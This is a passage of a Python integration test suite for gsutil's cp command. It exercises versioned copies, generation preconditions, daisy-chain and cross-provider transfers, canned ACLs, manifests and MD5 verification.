self.assertEquals(storage_uri(uri_str1).object_name, 'k')
size2, _, uri_str2, _ = listing2[1].split()
self.assertEquals(size2, str(len('longer_data1')))
self.assertEquals(storage_uri(uri_str2).object_name, 'k')
_Check2()
# Recursively copy to second versioned bucket with no -A flag.
# This should copy only the live object.
self.RunGsUtil(['cp', '-R', suri(bucket1_uri, '*'), suri(bucket3_uri)])
# Use @Retry as hedge against bucket listing eventual consistency.
@Retry(AssertionError, tries=3, timeout_secs=1)
def _Check3():
"""Validates the results of the cp -R."""
listing1 = self.RunGsUtil(['ls', '-la', suri(bucket1_uri)],
return_stdout=True).split('\n')
listing2 = self.RunGsUtil(['ls', '-la', suri(bucket3_uri)],
return_stdout=True).split('\n')
# 2 lines of listing output, 1 summary line, 1 empty line from \n split.
self.assertEquals(len(listing1), 4)
      # 1 line of listing output, 1 summary line, 1 empty line from \n split.
self.assertEquals(len(listing2), 3)
# Live (second) object in bucket 1 should match the single live object.
size1, _, uri_str1, _ = listing2[0].split()
self.assertEquals(size1, str(len('longer_data1')))
self.assertEquals(storage_uri(uri_str1).object_name, 'k')
_Check3()
@SequentialAndParallelTransfer
@SkipForS3('Preconditions not supported for S3.')
def test_cp_generation_zero_match(self):
"""Tests that cp handles an object-not-exists precondition header."""
bucket_uri = self.CreateBucket()
fpath1 = self.CreateTempFile(contents=b'data1')
# Match 0 means only write the object if it doesn't already exist.
gen_match_header = 'x-goog-if-generation-match:0'
# First copy should succeed.
# TODO: This can fail (rarely) if the server returns a 5xx but actually
# commits the bytes. If we add restarts on small uploads, handle this
# case.
self.RunGsUtil(['-h', gen_match_header, 'cp', fpath1, suri(bucket_uri)])
# Second copy should fail with a precondition error.
stderr = self.RunGsUtil(
['-h', gen_match_header, 'cp', fpath1,
suri(bucket_uri)],
return_stderr=True,
expected_status=1)
self.assertIn('PreconditionException', stderr)
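  # The x-goog-if-generation-match header used above carries a generation
  # precondition: 0 means "write only if the object does not yet exist",
  # while a concrete generation (as in the next test) means "write only if
  # the live object currently has that generation". A minimal sketch of
  # building that header string (illustrative helper, not used by the tests):
  def _generation_match_header(self, generation=0):
    """Returns a gsutil -h style if-generation-match precondition header."""
    return 'x-goog-if-generation-match:%s' % generation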
@SequentialAndParallelTransfer
@SkipForS3('Preconditions not supported for S3.')
def test_cp_v_generation_match(self):
"""Tests that cp -v option handles the if-generation-match header."""
bucket_uri = self.CreateVersionedBucket()
k1_uri = self.CreateObject(bucket_uri=bucket_uri, contents=b'data1')
g1 = k1_uri.generation
tmpdir = self.CreateTempDir()
fpath1 = self.CreateTempFile(tmpdir=tmpdir, contents=b'data2')
gen_match_header = 'x-goog-if-generation-match:%s' % g1
# First copy should succeed.
self.RunGsUtil(['-h', gen_match_header, 'cp', fpath1, suri(k1_uri)])
# Second copy should fail the precondition.
stderr = self.RunGsUtil(
['-h', gen_match_header, 'cp', fpath1,
suri(k1_uri)],
return_stderr=True,
expected_status=1)
self.assertIn('PreconditionException', stderr)
    # Specifying a generation with -n should fail before the request hits the
# server.
stderr = self.RunGsUtil(
['-h', gen_match_header, 'cp', '-n', fpath1,
suri(k1_uri)],
return_stderr=True,
expected_status=1)
self.assertIn('ArgumentException', stderr)
self.assertIn(
'Specifying x-goog-if-generation-match is not supported '
'with cp -n', stderr)
@SequentialAndParallelTransfer
def test_cp_nv(self):
"""Tests that cp -nv works when skipping existing file."""
bucket_uri = self.CreateVersionedBucket()
k1_uri = self.CreateObject(bucket_uri=bucket_uri, contents=b'data1')
tmpdir = self.CreateTempDir()
fpath1 = self.CreateTempFile(tmpdir=tmpdir, contents=b'data2')
# First copy should succeed.
self.RunGsUtil(['cp', '-nv', fpath1, suri(k1_uri)])
# Second copy should skip copying.
stderr = self.RunGsUtil(
['cp', '-nv', fpath1, suri(k1_uri)], return_stderr=True)
self.assertIn('Skipping existing item:', stderr)
@SequentialAndParallelTransfer
@SkipForS3('S3 lists versioned objects in reverse timestamp order.')
def test_cp_v_option(self):
""""Tests that cp -v returns the created object's version-specific URI."""
bucket_uri = self.CreateVersionedBucket()
k1_uri = self.CreateObject(bucket_uri=bucket_uri, contents=b'data1')
k2_uri = self.CreateObject(bucket_uri=bucket_uri, contents=b'data2')
# Case 1: Upload file to object using one-shot PUT.
tmpdir = self.CreateTempDir()
fpath1 = self.CreateTempFile(tmpdir=tmpdir, contents=b'data1')
self._run_cp_minus_v_test('-v', fpath1, k2_uri.uri)
# Case 2: Upload file to object using resumable upload.
size_threshold = ONE_KIB
boto_config_for_test = ('GSUtil', 'resumable_threshold',
str(size_threshold))
with SetBotoConfigForTest([boto_config_for_test]):
file_as_string = os.urandom(size_threshold)
tmpdir = self.CreateTempDir()
fpath1 = self.CreateTempFile(tmpdir=tmpdir, contents=file_as_string)
self._run_cp_minus_v_test('-v', fpath1, k2_uri.uri)
# Case 3: Upload stream to object.
self._run_cp_minus_v_test('-v', '-', k2_uri.uri)
# Case 4: Download object to file. For this case we just expect output of
# gsutil cp -v to be the URI of the file.
tmpdir = self.CreateTempDir()
fpath1 = self.CreateTempFile(tmpdir=tmpdir)
dst_uri = storage_uri(fpath1)
stderr = self.RunGsUtil(
['cp', '-v', suri(k1_uri), suri(dst_uri)], return_stderr=True)
    # TODO: Add ordering assertion (should be in stderr.split('\n')[-2]) back
# once both the creation and status messages are handled by the UI thread.
self.assertIn('Created: %s\n' % dst_uri.uri, stderr)
# Case 5: Daisy-chain from object to object.
self._run_cp_minus_v_test('-Dv', k1_uri.uri, k2_uri.uri)
# Case 6: Copy object to object in-the-cloud.
self._run_cp_minus_v_test('-v', k1_uri.uri, k2_uri.uri)
def _run_cp_minus_v_test(self, opt, src_str, dst_str):
"""Runs cp -v with the options and validates the results."""
stderr = self.RunGsUtil(['cp', opt, src_str, dst_str], return_stderr=True)
match = re.search(r'Created: (.*)\n', stderr)
self.assertIsNotNone(match)
created_uri = match.group(1)
# Use @Retry as hedge against bucket listing eventual consistency.
@Retry(AssertionError, tries=3, timeout_secs=1)
def _Check1():
stdout = self.RunGsUtil(['ls', '-a', dst_str], return_stdout=True)
lines = stdout.split('\n')
      # Final (most recent) object should match the "Created:" URI. It is on
      # the second-to-last line (the trailing newline leaves an empty last
      # element after the split).
self.assertGreater(len(lines), 2)
self.assertEqual(created_uri, lines[-2])
_Check1()
@SequentialAndParallelTransfer
def test_stdin_args(self):
"""Tests cp with the -I option."""
tmpdir = self.CreateTempDir()
fpath1 = self.CreateTempFile(tmpdir=tmpdir, contents=b'data1')
fpath2 = self.CreateTempFile(tmpdir=tmpdir, contents=b'data2')
bucket_uri = self.CreateBucket()
self.RunGsUtil(['cp', '-I', suri(bucket_uri)],
stdin='\n'.join((fpath1, fpath2)))
# Use @Retry as hedge against bucket listing eventual consistency.
@Retry(AssertionError, tries=3, timeout_secs=1)
def _Check1():
stdout = self.RunGsUtil(['ls', suri(bucket_uri)], return_stdout=True)
self.assertIn(os.path.basename(fpath1), stdout)
self.assertIn(os.path.basename(fpath2), stdout)
self.assertNumLines(stdout, 2)
_Check1()
def test_cross_storage_class_cloud_cp(self):
bucket1_uri = self.CreateBucket(storage_class='standard')
bucket2_uri = self.CreateBucket(
storage_class='durable_reduced_availability')
key_uri = self.CreateObject(bucket_uri=bucket1_uri, contents=b'foo')
# Server now allows copy-in-the-cloud across storage classes.
self.RunGsUtil(['cp', suri(key_uri), suri(bucket2_uri)])
@unittest.skipUnless(HAS_S3_CREDS, 'Test requires both S3 and GS credentials')
def test_cross_provider_cp(self):
s3_bucket = self.CreateBucket(provider='s3')
gs_bucket = self.CreateBucket(provider='gs')
s3_key = self.CreateObject(bucket_uri=s3_bucket, contents=b'foo')
gs_key = self.CreateObject(bucket_uri=gs_bucket, contents=b'bar')
self.RunGsUtil(['cp', suri(s3_key), suri(gs_bucket)])
self.RunGsUtil(['cp', suri(gs_key), suri(s3_bucket)])
@unittest.skipUnless(HAS_S3_CREDS, 'Test requires both S3 and GS credentials')
@unittest.skip('This test performs a large copy but remains here for '
'debugging purposes.')
def test_cross_provider_large_cp(self):
s3_bucket = self.CreateBucket(provider='s3')
gs_bucket = self.CreateBucket(provider='gs')
s3_key = self.CreateObject(bucket_uri=s3_bucket,
contents=b'f' * 1024 * 1024)
gs_key = self.CreateObject(bucket_uri=gs_bucket,
contents=b'b' * 1024 * 1024)
self.RunGsUtil(['cp', suri(s3_key), suri(gs_bucket)])
self.RunGsUtil(['cp', suri(gs_key), suri(s3_bucket)])
with SetBotoConfigForTest([('GSUtil', 'resumable_threshold', str(ONE_KIB)),
('GSUtil', 'json_resumable_chunk_size',
str(ONE_KIB * 256))]):
# Ensure copy also works across json upload chunk boundaries.
self.RunGsUtil(['cp', suri(s3_key), suri(gs_bucket)])
@unittest.skipUnless(HAS_S3_CREDS, 'Test requires both S3 and GS credentials')
def test_gs_to_s3_multipart_cp(self):
"""Ensure daisy_chain works for an object that is downloaded in 2 parts."""
s3_bucket = self.CreateBucket(provider='s3')
gs_bucket = self.CreateBucket(provider='gs', prefer_json_api=True)
num_bytes = int(_DEFAULT_DOWNLOAD_CHUNK_SIZE * 1.1)
gs_key = self.CreateObject(bucket_uri=gs_bucket,
contents=b'b' * num_bytes,
prefer_json_api=True)
self.RunGsUtil([
'-o', 's3:use-sigv4=True', '-o', 's3:host=s3.amazonaws.com', 'cp',
suri(gs_key),
suri(s3_bucket)
])
@unittest.skip('This test is slow due to creating many objects, '
'but remains here for debugging purposes.')
def test_daisy_chain_cp_file_sizes(self):
"""Ensure daisy chain cp works with a wide of file sizes."""
bucket_uri = self.CreateBucket()
bucket2_uri = self.CreateBucket()
exponent_cap = 28 # Up to 256 MiB in size.
for i in range(exponent_cap):
one_byte_smaller = 2**i - 1
normal = 2**i
one_byte_larger = 2**i + 1
self.CreateObject(bucket_uri=bucket_uri, contents=b'a' * one_byte_smaller)
self.CreateObject(bucket_uri=bucket_uri, contents=b'b' * normal)
self.CreateObject(bucket_uri=bucket_uri, contents=b'c' * one_byte_larger)
self.AssertNObjectsInBucket(bucket_uri, exponent_cap * 3)
self.RunGsUtil(
['-m', 'cp', '-D',
suri(bucket_uri, '**'),
suri(bucket2_uri)])
self.AssertNObjectsInBucket(bucket2_uri, exponent_cap * 3)
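  # The size sweep above deliberately straddles power-of-two boundaries, where
  # chunking and buffer-edge bugs tend to hide: for each exponent i it uploads
  # objects of 2**i - 1, 2**i, and 2**i + 1 bytes. A minimal sketch of that
  # size generator (illustrative helper, not used by the tests):
  def _boundary_sizes(self, exponent_cap):
    """Yields object sizes straddling each power of two below the cap."""
    for i in range(exponent_cap):
      yield 2**i - 1
      yield 2**i
      yield 2**i + 1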
def test_daisy_chain_cp(self):
"""Tests cp with the -D option."""
bucket1_uri = self.CreateBucket(storage_class='standard')
bucket2_uri = self.CreateBucket(
storage_class='durable_reduced_availability')
key_uri = self.CreateObject(bucket_uri=bucket1_uri, contents=b'foo')
# Set some headers on source object so we can verify that headers are
    # preserved by daisy-chain copy.
self.RunGsUtil([
'setmeta', '-h', 'Cache-Control:public,max-age=12', '-h',
'Content-Type:image/gif', '-h',
'x-%s-meta-1:abcd' % self.provider_custom_meta,
suri(key_uri)
])
# Set public-read (non-default) ACL so we can verify that cp -D -p works.
self.RunGsUtil(['acl', 'set', 'public-read', suri(key_uri)])
acl_json = self.RunGsUtil(['acl', 'get', suri(key_uri)], return_stdout=True)
# Perform daisy-chain copy and verify that source object headers and ACL
# were preserved. Also specify -n option to test that gsutil correctly
    # removes the x-goog-if-generation-match:0 header (set at upload time)
    # when it later updates the ACL.
stderr = self.RunGsUtil(
['cp', '-Dpn', suri(key_uri),
suri(bucket2_uri)], return_stderr=True)
self.assertNotIn('Copy-in-the-cloud disallowed', stderr)
@Retry(AssertionError, tries=3, timeout_secs=1)
def _Check():
uri = suri(bucket2_uri, key_uri.object_name)
stdout = self.RunGsUtil(['ls', '-L', uri], return_stdout=True)
self.assertRegex(stdout, r'Cache-Control:\s+public,max-age=12')
self.assertRegex(stdout, r'Content-Type:\s+image/gif')
self.assertRegex(stdout, r'Metadata:\s+1:\s+abcd')
new_acl_json = self.RunGsUtil(['acl', 'get', uri], return_stdout=True)
self.assertEqual(acl_json, new_acl_json)
_Check()
@unittest.skipUnless(
not HAS_GS_PORT, 'gs_port is defined in config which can cause '
'problems when uploading and downloading to the same local host port')
def test_daisy_chain_cp_download_failure(self):
"""Tests cp with the -D option when the download thread dies."""
bucket1_uri = self.CreateBucket()
bucket2_uri = self.CreateBucket()
key_uri = self.CreateObject(bucket_uri=bucket1_uri,
contents=b'a' * self.halt_size)
boto_config_for_test = ('GSUtil', 'resumable_threshold', str(ONE_KIB))
test_callback_file = self.CreateTempFile(
contents=pickle.dumps(HaltingCopyCallbackHandler(False, 5)))
with SetBotoConfigForTest([boto_config_for_test]):
stderr = self.RunGsUtil([
'cp', '--testcallbackfile', test_callback_file, '-D',
suri(key_uri),
suri(bucket2_uri)
],
expected_status=1,
return_stderr=True)
# Should have three exception traces; one from the download thread and
    # two from the upload thread (exception message is repeated in main's
# _OutputAndExit).
self.assertEqual(
stderr.count(
'ResumableDownloadException: Artifically halting download'), 3)
def test_streaming_gzip_upload(self):
"""Tests error when compression flag is requested on a streaming source."""
bucket_uri = self.CreateBucket()
stderr = self.RunGsUtil(
['cp', '-Z', '-', suri(bucket_uri, 'foo')],
return_stderr=True,
expected_status=1,
stdin='streaming data')
self.assertIn(
'gzip compression is not currently supported on streaming uploads',
stderr)
def test_seek_ahead_upload_cp(self):
"""Tests that the seek-ahead iterator estimates total upload work."""
tmpdir = self.CreateTempDir(test_files=3)
bucket_uri = self.CreateBucket()
with SetBotoConfigForTest([('GSUtil', 'task_estimation_threshold', '1'),
('GSUtil', 'task_estimation_force', 'True')]):
stderr = self.RunGsUtil(
['-m', 'cp', '-r', tmpdir, suri(bucket_uri)], return_stderr=True)
self.assertIn(
'Estimated work for this command: objects: 3, total size: 18', stderr)
with SetBotoConfigForTest([('GSUtil', 'task_estimation_threshold', '0'),
('GSUtil', 'task_estimation_force', 'True')]):
stderr = self.RunGsUtil(
['-m', 'cp', '-r', tmpdir, suri(bucket_uri)], return_stderr=True)
self.assertNotIn('Estimated work', stderr)
def test_seek_ahead_download_cp(self):
tmpdir = self.CreateTempDir()
bucket_uri = self.CreateBucket(test_objects=3)
self.AssertNObjectsInBucket(bucket_uri, 3)
with SetBotoConfigForTest([('GSUtil', 'task_estimation_threshold', '1'),
('GSUtil', 'task_estimation_force', 'True')]):
stderr = self.RunGsUtil(
['-m', 'cp', '-r', suri(bucket_uri), tmpdir], return_stderr=True)
self.assertIn(
'Estimated work for this command: objects: 3, total size: 18', stderr)
with SetBotoConfigForTest([('GSUtil', 'task_estimation_threshold', '0'),
('GSUtil', 'task_estimation_force', 'True')]):
stderr = self.RunGsUtil(
['-m', 'cp', '-r', suri(bucket_uri), tmpdir], return_stderr=True)
self.assertNotIn('Estimated work', stderr)
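  # Both seek-ahead tests drive the estimator purely through boto config: a
  # nonzero task_estimation_threshold (combined with task_estimation_force)
  # makes gsutil print the "Estimated work" line, while a threshold of '0'
  # suppresses it. A small sketch of building those config pairs for
  # SetBotoConfigForTest (illustrative helper, not used by the tests):
  def _seek_ahead_boto_config(self, enabled):
    """Returns boto config tuples that enable or disable work estimation."""
    threshold = '1' if enabled else '0'
    return [('GSUtil', 'task_estimation_threshold', threshold),
            ('GSUtil', 'task_estimation_force', 'True')]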
def test_canned_acl_cp(self):
"""Tests copying with a canned ACL."""
bucket1_uri = self.CreateBucket()
bucket2_uri = self.CreateBucket()
key_uri = self.CreateObject(bucket_uri=bucket1_uri, contents=b'foo')
self.RunGsUtil(
['cp', '-a', 'public-read',
suri(key_uri),
suri(bucket2_uri)])
# Set public-read on the original key after the copy so we can compare
# the ACLs.
self.RunGsUtil(['acl', 'set', 'public-read', suri(key_uri)])
public_read_acl = self.RunGsUtil(['acl', 'get', suri(key_uri)],
return_stdout=True)
@Retry(AssertionError, tries=3, timeout_secs=1)
def _Check():
uri = suri(bucket2_uri, key_uri.object_name)
new_acl_json = self.RunGsUtil(['acl', 'get', uri], return_stdout=True)
self.assertEqual(public_read_acl, new_acl_json)
_Check()
@SequentialAndParallelTransfer
def test_canned_acl_upload(self):
"""Tests uploading a file with a canned ACL."""
bucket1_uri = self.CreateBucket()
key_uri = self.CreateObject(bucket_uri=bucket1_uri, contents=b'foo')
# Set public-read on the object so we can compare the ACLs.
self.RunGsUtil(['acl', 'set', 'public-read', suri(key_uri)])
public_read_acl = self.RunGsUtil(['acl', 'get', suri(key_uri)],
return_stdout=True)
file_name = 'bar'
fpath = self.CreateTempFile(file_name=file_name, contents=b'foo')
self.RunGsUtil(['cp', '-a', 'public-read', fpath, suri(bucket1_uri)])
new_acl_json = self.RunGsUtil(
['acl', 'get', suri(bucket1_uri, file_name)], return_stdout=True)
self.assertEqual(public_read_acl, new_acl_json)
resumable_size = ONE_KIB
boto_config_for_test = ('GSUtil', 'resumable_threshold',
str(resumable_size))
with SetBotoConfigForTest([boto_config_for_test]):
resumable_file_name = 'resumable_bar'
resumable_contents = os.urandom(resumable_size)
resumable_fpath = self.CreateTempFile(file_name=resumable_file_name,
contents=resumable_contents)
self.RunGsUtil(
['cp', '-a', 'public-read', resumable_fpath,
suri(bucket1_uri)])
new_resumable_acl_json = self.RunGsUtil(
['acl', 'get', suri(bucket1_uri, resumable_file_name)],
return_stdout=True)
self.assertEqual(public_read_acl, new_resumable_acl_json)
def test_cp_key_to_local_stream(self):
bucket_uri = self.CreateBucket()
contents = b'foo'
key_uri = self.CreateObject(bucket_uri=bucket_uri, contents=contents)
stdout = self.RunGsUtil(['cp', suri(key_uri), '-'], return_stdout=True)
self.assertIn(contents, stdout.encode('ascii'))
def test_cp_local_file_to_local_stream(self):
contents = b'content'
fpath = self.CreateTempFile(contents=contents)
stdout = self.RunGsUtil(['cp', fpath, '-'], return_stdout=True)
self.assertIn(contents, stdout.encode(UTF8))
@SequentialAndParallelTransfer
def test_cp_zero_byte_file(self):
dst_bucket_uri = self.CreateBucket()
src_dir = self.CreateTempDir()
fpath = os.path.join(src_dir, 'zero_byte')
with open(fpath, 'w') as unused_out_file:
pass # Write a zero byte file
self.RunGsUtil(['cp', fpath, suri(dst_bucket_uri)])
@Retry(AssertionError, tries=3, timeout_secs=1)
def _Check1():
stdout = self.RunGsUtil(['ls', suri(dst_bucket_uri)], return_stdout=True)
self.assertIn(os.path.basename(fpath), stdout)
_Check1()
download_path = os.path.join(src_dir, 'zero_byte_download')
self.RunGsUtil(['cp', suri(dst_bucket_uri, 'zero_byte'), download_path])
self.assertTrue(os.stat(download_path))
def test_copy_bucket_to_bucket(self):
"""Tests recursively copying from bucket to bucket.
This should produce identically named objects (and not, in particular,
destination objects named by the version-specific URI from source objects).
"""
src_bucket_uri = self.CreateVersionedBucket()
dst_bucket_uri = self.CreateVersionedBucket()
self.CreateObject(bucket_uri=src_bucket_uri,
object_name='obj0',
contents=b'abc')
self.CreateObject(bucket_uri=src_bucket_uri,
object_name='obj1',
contents=b'def')
# Use @Retry as hedge against bucket listing eventual consistency.
@Retry(AssertionError, tries=3, timeout_secs=1)
def _CopyAndCheck():
self.RunGsUtil(['cp', '-R', suri(src_bucket_uri), suri(dst_bucket_uri)])
stdout = self.RunGsUtil(['ls', '-R', dst_bucket_uri.uri],
return_stdout=True)
self.assertIn(
'%s%s/obj0\n' % (dst_bucket_uri, src_bucket_uri.bucket_name), stdout)
self.assertIn(
'%s%s/obj1\n' % (dst_bucket_uri, src_bucket_uri.bucket_name), stdout)
_CopyAndCheck()
@SkipForGS('Only s3 V4 signatures error on location mismatches.')
def test_copy_bucket_to_bucket_with_location_redirect(self):
# cp uses a sender function that raises an exception on location mismatches,
# instead of returning a response. This integration test ensures retries
# from exceptions work correctly.
src_bucket_region = 'ap-east-1'
dest_bucket_region = 'us-east-2'
src_bucket_host = 's3.%s.amazonaws.com' % src_bucket_region
dest_bucket_host = 's3.%s.amazonaws.com' % dest_bucket_region
client_host = 's3.eu-west-1.amazonaws.com'
with SetBotoConfigForTest([('s3', 'host', src_bucket_host)]):
src_bucket_uri = self.CreateBucket(location=src_bucket_region)
self.CreateObject(bucket_uri=src_bucket_uri,
object_name='obj0',
contents=b'abc')
self.CreateObject(bucket_uri=src_bucket_uri,
object_name='obj1',
contents=b'def')
with SetBotoConfigForTest([('s3', 'host', dest_bucket_host)]):
dst_bucket_uri = self.CreateBucket(location=dest_bucket_region)
# Use @Retry as hedge against bucket listing eventual consistency.
@Retry(AssertionError, tries=3, timeout_secs=1)
def _CopyAndCheck():
self.RunGsUtil(['cp', '-R', suri(src_bucket_uri), suri(dst_bucket_uri)])
stdout = self.RunGsUtil(['ls', '-R', dst_bucket_uri.uri],
return_stdout=True)
self.assertIn(
'%s%s/obj0\n' % (dst_bucket_uri, src_bucket_uri.bucket_name), stdout)
self.assertIn(
'%s%s/obj1\n' % (dst_bucket_uri, src_bucket_uri.bucket_name), stdout)
with SetBotoConfigForTest([('s3', 'host', client_host)]):
_CopyAndCheck()
def test_copy_bucket_to_dir(self):
"""Tests recursively copying from bucket to a directory.
This should produce identically named objects (and not, in particular,
    destination objects named by the version-specific URI from source objects).
"""
src_bucket_uri = self.CreateBucket()
dst_dir = self.CreateTempDir()
self.CreateObject(bucket_uri=src_bucket_uri,
object_name='obj0',
contents=b'abc')
self.CreateObject(bucket_uri=src_bucket_uri,
object_name='obj1',
contents=b'def')
# Use @Retry as hedge against bucket listing eventual consistency.
@Retry(AssertionError, tries=3, timeout_secs=1)
def _CopyAndCheck():
"""Copies the bucket recursively and validates the results."""
self.RunGsUtil(['cp', '-R', suri(src_bucket_uri), dst_dir])
dir_list = []
for dirname, _, filenames in os.walk(dst_dir):
for filename in filenames:
dir_list.append(os.path.join(dirname, filename))
dir_list = sorted(dir_list)
self.assertEqual(len(dir_list), 2)
self.assertEqual(
os.path.join(dst_dir, src_bucket_uri.bucket_name, 'obj0'),
dir_list[0])
self.assertEqual(
os.path.join(dst_dir, src_bucket_uri.bucket_name, 'obj1'),
dir_list[1])
_CopyAndCheck()
@unittest.skipUnless(HAS_S3_CREDS, 'Test requires both S3 and GS credentials')
def test_copy_object_to_dir_s3_v4(self):
"""Tests copying object from s3 to local dir with v4 signature.
    Regions like us-east-2 accept only V4 signatures, so we create the bucket
    in the us-east-2 region to force testing with a V4 signature.
"""
src_bucket_uri = self.CreateBucket(provider='s3', location='us-east-2')
dst_dir = self.CreateTempDir()
self.CreateObject(bucket_uri=src_bucket_uri,
object_name='obj0',
contents=b'abc')
self.CreateObject(bucket_uri=src_bucket_uri,
object_name='obj1',
contents=b'def')
# Use @Retry as hedge against bucket listing eventual consistency.
@Retry(AssertionError, tries=3, timeout_secs=1)
def _CopyAndCheck():
"""Copies the bucket recursively and validates the results."""
self.RunGsUtil(['cp', '-R', suri(src_bucket_uri), dst_dir])
dir_list = []
for dirname, _, filenames in os.walk(dst_dir):
for filename in filenames:
dir_list.append(os.path.join(dirname, filename))
dir_list = sorted(dir_list)
self.assertEqual(len(dir_list), 2)
self.assertEqual(
os.path.join(dst_dir, src_bucket_uri.bucket_name, 'obj0'),
dir_list[0])
self.assertEqual(
os.path.join(dst_dir, src_bucket_uri.bucket_name, 'obj1'),
dir_list[1])
_CopyAndCheck()
@SkipForS3('The boto lib used for S3 does not handle objects '
'starting with slashes if we use V4 signature')
def test_recursive_download_with_leftover_slash_only_dir_placeholder(self):
"""Tests that we correctly handle leftover dir placeholders."""
src_bucket_uri = self.CreateBucket()
dst_dir = self.CreateTempDir()
self.CreateObject(bucket_uri=src_bucket_uri,
object_name='obj0',
contents=b'abc')
self.CreateObject(bucket_uri=src_bucket_uri,
object_name='obj1',
contents=b'def')
# Create a placeholder like what can be left over by web GUI tools.
key_uri = self.StorageUriCloneReplaceName(src_bucket_uri, '/')
self.StorageUriSetContentsFromString(key_uri, '')
self.AssertNObjectsInBucket(src_bucket_uri, 3)
self.RunGsUtil(['cp', '-R', suri(src_bucket_uri), dst_dir])
dir_list = []
for dirname, _, filenames in os.walk(dst_dir):
for filename in filenames:
dir_list.append(os.path.join(dirname, filename))
dir_list = sorted(dir_list)
self.assertEqual(len(dir_list), 2)
self.assertEqual(os.path.join(dst_dir, src_bucket_uri.bucket_name, 'obj0'),
dir_list[0])
self.assertEqual(os.path.join(dst_dir, src_bucket_uri.bucket_name, 'obj1'),
dir_list[1])
def test_recursive_download_with_leftover_dir_placeholder(self):
"""Tests that we correctly handle leftover dir placeholders."""
src_bucket_uri = self.CreateBucket()
dst_dir = self.CreateTempDir()
self.CreateObject(bucket_uri=src_bucket_uri,
object_name='obj0',
contents=b'abc')
self.CreateObject(bucket_uri=src_bucket_uri,
object_name='obj1',
contents=b'def')
# Create a placeholder like what can be left over by web GUI tools.
key_uri = self.StorageUriCloneReplaceName(src_bucket_uri, 'foo/')
self.StorageUriSetContentsFromString(key_uri, '')
self.AssertNObjectsInBucket(src_bucket_uri, 3)
self.RunGsUtil(['cp', '-R', suri(src_bucket_uri), dst_dir])
dir_list = []
for dirname, _, filenames in os.walk(dst_dir):
for filename in filenames:
dir_list.append(os.path.join(dirname, filename))
dir_list = sorted(dir_list)
self.assertEqual(len(dir_list), 2)
self.assertEqual(os.path.join(dst_dir, src_bucket_uri.bucket_name, 'obj0'),
dir_list[0])
self.assertEqual(os.path.join(dst_dir, src_bucket_uri.bucket_name, 'obj1'),
dir_list[1])
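  # Both placeholder tests rely on recursive downloads skipping objects whose
  # names end with '/', so only the two real objects produce local files. A
  # minimal sketch of that filtering decision (illustrative only; this is not
  # gsutil's actual implementation):
  def _is_dir_placeholder(self, object_name):
    """Returns True for zero-content placeholder names such as 'foo/' or '/'."""
    return object_name.endswith('/')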
def test_copy_quiet(self):
bucket_uri = self.CreateBucket()
key_uri = self.CreateObject(bucket_uri=bucket_uri, contents=b'foo')
stderr = self.RunGsUtil([
'-q', 'cp',
suri(key_uri),
suri(self.StorageUriCloneReplaceName(bucket_uri, 'o2'))
],
return_stderr=True)
self.assertEqual(stderr.count('Copying '), 0)
def test_cp_md5_match(self):
"""Tests that the uploaded object has the expected MD5.
    Note that while this does perform a file-to-object upload, MD5s are
not supported for composite objects so we don't use the decorator in this
case.
"""
bucket_uri = self.CreateBucket()
fpath = self.CreateTempFile(contents=b'bar')
with open(fpath, 'rb') as f_in:
md5 = binascii.unhexlify(CalculateMd5FromContents(f_in))
try:
encoded_bytes = base64.encodebytes(md5)
except AttributeError:
      # For Python 2 compatibility.
encoded_bytes = base64.encodestring(md5)
file_md5 = encoded_bytes.rstrip(b'\n')
self.RunGsUtil(['cp', fpath, suri(bucket_uri)])
# Use @Retry as hedge against bucket listing eventual consistency.
@Retry(AssertionError, tries=3, timeout_secs=1)
def _Check1():
stdout = self.RunGsUtil(['ls', '-L', suri(bucket_uri)],
return_stdout=True)
self.assertRegex(
stdout, r'Hash\s+\(md5\):\s+%s' % re.escape(file_md5.decode('ascii')))
_Check1()
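  # The MD5 check above compares the base64 encoding of the *binary* MD5
  # digest, which is the form `ls -L` reports, rather than the hex digest. A
  # stdlib-only sketch of computing that value (illustrative helper, not used
  # by the tests; assumed equivalent to the unhexlify/encodebytes steps above):
  def _b64_md5_of_file(self, path):
    """Returns the base64-encoded binary MD5 digest of the file at `path`."""
    import hashlib  # local import keeps the sketch self-contained
    with open(path, 'rb') as fp:
      return base64.b64encode(hashlib.md5(fp.read()).digest())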
@unittest.skipIf(IS_WINDOWS,
'Unicode handling on Windows requires mods to site-packages')
@SequentialAndParallelTransfer
def test_cp_manifest_upload_unicode(self):
return self._ManifestUpload('foo-unicöde'.encode(UTF8),
'bar-unicöde'.encode(UTF8),
'manifest-unicöde'.encode(UTF8))
@SequentialAndParallelTransfer
def test_cp_manifest_upload(self):
"""Tests uploading with a mnifest file."""
return self._ManifestUpload('foo', 'bar', 'manifest')
def _ManifestUpload(self, file_name, object_name, manifest_name):
"""Tests uploading with a manifest file."""
bucket_uri = self.CreateBucket()
dsturi = suri(bucket_uri, object_name)
fpath = self.CreateTempFile(file_name=file_name, contents=b'bar')
logpath = self.CreateTempFile(file_name=manifest_name, contents=b'')
# Ensure the file is empty.
open(logpath, 'w').close()
self.RunGsUtil(['cp', '-L', logpath, fpath, dsturi])
with open(logpath, 'r') as f:
lines = f.readlines()
if six.PY2:
lines = [six.text_type(line, UTF8) for line in lines]
self.assertEqual(len(lines), 2)
expected_headers = [
'Source', 'Destination', 'Start', 'End', 'Md5', 'UploadId',
'Source Size', 'Bytes Transferred', 'Result', 'Description'
]
self.assertEqual(expected_headers, lines[0].strip().split(','))
results = lines[1].strip().split(',')
results = dict(zip(expected_headers, results))
self.assertEqual(
results['Source'],
'file://' + fpath,
)
self.assertEqual(
results['Destination'],
dsturi,
)
date_format = '%Y-%m-%dT%H:%M:%S.%fZ'
start_date = datetime.datetime.strptime(results['Start'], date_format)
end_date = datetime.datetime.strptime(results['End'], date_format)
self.assertEqual(end_date > start_date, True)
if self.RunGsUtil == testcase.GsUtilIntegrationTestCase.RunGsUtil:
# Check that we didn't do automatic parallel uploads - compose doesn't
    # calculate the MD5 hash. Since RunGsUtil is overridden in
# TestCpParallelUploads to force parallel uploads, we can check which
# method was used.
self.assertEqual(results['Md5'], 'rL0Y20zC+Fzt72VPzMSk2A==')
self.assertEqual(int(results['Source Size']), 3)
self.assertEqual(int(results['Bytes Transferred']), 3)
self.assertEqual(results['Result'], 'OK')
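  # The -L manifest written above is a plain CSV whose first row is the header
  # listed in expected_headers; the test splits it by hand. An equivalent
  # stdlib sketch of reading it into dicts (illustrative helper, not used by
  # the tests):
  def _read_manifest_rows(self, logpath):
    """Returns the cp -L manifest as a list of column-name -> value dicts."""
    import csv  # local import keeps the sketch self-contained
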